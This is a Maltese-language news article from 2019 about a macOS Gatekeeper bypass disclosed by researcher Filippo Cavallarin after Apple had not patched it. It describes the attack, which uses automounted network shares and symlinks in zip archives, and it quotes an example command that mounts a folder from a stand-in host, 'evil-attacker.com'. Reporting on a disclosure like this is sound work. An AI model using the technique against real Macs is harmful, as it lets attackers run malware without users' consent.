Huwa faċli li tinstalla app malizzjuża fuq Mac. Apple ma rranġax l-iżball anke wara tliet xhur

27. 5. 2019

Ir-riċerkatur tas-sigurtà Filippo Cavallarin poġġa twissija dwar il-bug f'macOS 10.14.5 fuq il-blog tiegħu. Dan jikkonsisti fil-possibbiltà li jiġu evitati kompletament il-miżuri ta' sigurtà ta' Gatekeeper. Skont Cavallarin, huwa rrimarka l-iżball lil Apple diġà fi Frar ta 'din is-sena, iżda l-kumpanija ma rranġatx fl-aħħar aġġornament.

Gatekeeper ġie żviluppat minn Apple u inkorporat fis-sistema operattiva tad-desktop tiegħu għall-ewwel darba fl-2012. Huwa mekkaniżmu li jipprevjeni applikazzjoni milli taħdem mingħajr l-għarfien u l-kunsens tal-utent. Wara li tniżżel app, Gatekeeper awtomatikament jiċċekkja l-kodiċi tiegħu biex tara jekk is-softwer huwiex iffirmat sew minn Apple.

Fil-blog post tiegħu, Cavallarin jiddikjara li Gatekeeper, b'mod awtomatiku, iqis kemm il-ħażna esterna kif ukoll l-ishma tan-netwerk bħala postijiet siguri. Kwalunkwe applikazzjoni li tirrisjedi f'dawn il-miri tista' għalhekk tiġi mnedija awtomatikament mingħajr ma jkun hemm bżonn tgħaddi mill-kontroll Gatekeeper. Hija din il-karatteristika li tista 'tiġi sfruttata biex tniedi softwer malizzjuż mingħajr l-għarfien tal-utent.

Aspett wieħed li jippermetti aċċess mhux awtorizzat huwa l-karatteristika automount, li tippermetti lill-utenti jimmontaw awtomatikament sehem tan-netwerk sempliċement billi jispeċifikaw mogħdija li tibda b'"/net/". Bħala eżempju, Cavallarin isemmi l-mogħdija "ls /net/evil-attacker.com/sharedfolder/" li tista 'tikkawża li s-sistema operattiva tgħabbi l-kontenut ta' folder "sharefolder" f'post remot li jista 'jkun potenzjalment malizzjuż.

Tista' tara l-mod kif taħdem it-theddida fil-video:

Fattur ieħor huwa l-fatt li jekk arkivju zip li jkun fih symlink speċifiku li jwassal għall-funzjoni automount huwa kondiviż, mhux se jiġi kkontrollat minn Gatekeeper. B'dan il-mod, il-vittma tista 'faċilment tniżżel l-arkivju malizzjuż u unzip, li jippermetti lill-attakkant biex iħaddem prattikament kwalunkwe softwer fuq il-Mac mingħajr l-għarfien tal-utent. Il-Finder, li jaħbi ċerti estensjonijiet awtomatikament, għandu wkoll is-sehem tiegħu minn din il-vulnerabbiltà.

Cavallarin jiddikjara fuq il-blog tiegħu li Apple ġibdet l-attenzjoni għall-vulnerabbiltà tas-sistema operattiva macOS fit-22 ta 'Frar ta' din is-sena. Iżda f’nofs Mejju, Apple waqfet tikkomunika ma’ Cavallarin, u għalhekk Cavallarin iddeċieda li jagħmel il-ħaġa sħiħa pubblika.

Sors: FCVL

Suġġetti: ħażna, awtomatikament, MacOS, vidjo, Settings, funzjoni, utent, Applikazzjoni, Apple

Diskussjoni tal-artiklu

Ismek

Il-kumment tiegħek

Billi timla d-dejta t'hawn fuq, nirrikonoxxi li l-kumpanija TEXT FACTORY s.r.o., uffiċċju reġistrat fi Brno, Durďákova 336/29, Černá Pole, kodiċi ZIP: 613 00, numru ID: 06157831, reġistrata fil-Qorti Reġjonali f'Brno, sezzjoni C , daħħal 100399, ser tipproċessa d-dejta personali tiegħi pprovduta fil-formola ta’ reġistrazzjoni mimlija minni fuq il-bażi tal-interessi leġittimi ta’ TEXT FACTORY s.r.o. skont l-Artikolu 6 paragrafu 1 ittra f) GDPR u biex jiġu ssodisfati l-obbligi legali (l-Artikolu 6, paragrafu 1, ittra c) GDPR), għall-għanijiet li ġejjin: il-ħtieġa li tiġi żgurata l-awtorizzazzjoni ta’ viżitaturi għal websajts operati minn TEXT FACTORY s.r.o. biex jikkontribwixxu b’mod attiv għal artikli ppubblikati jew fid-diskussjoni. fora u jeżerċita d-drittijiet ta’ TEXT FACTORY s.r.o. bħala l-amministratur ta’ dawn il-forums ta’ diskussjoni. Aktar informazzjoni dwar l-ipproċessar tad-dejta personali u d-drittijiet tista’ ssibha f’ Lezzjonijiet dwar il-protezzjoni tad-data personali. it-test kollu

Jista 'jkun jinteressak

Relatati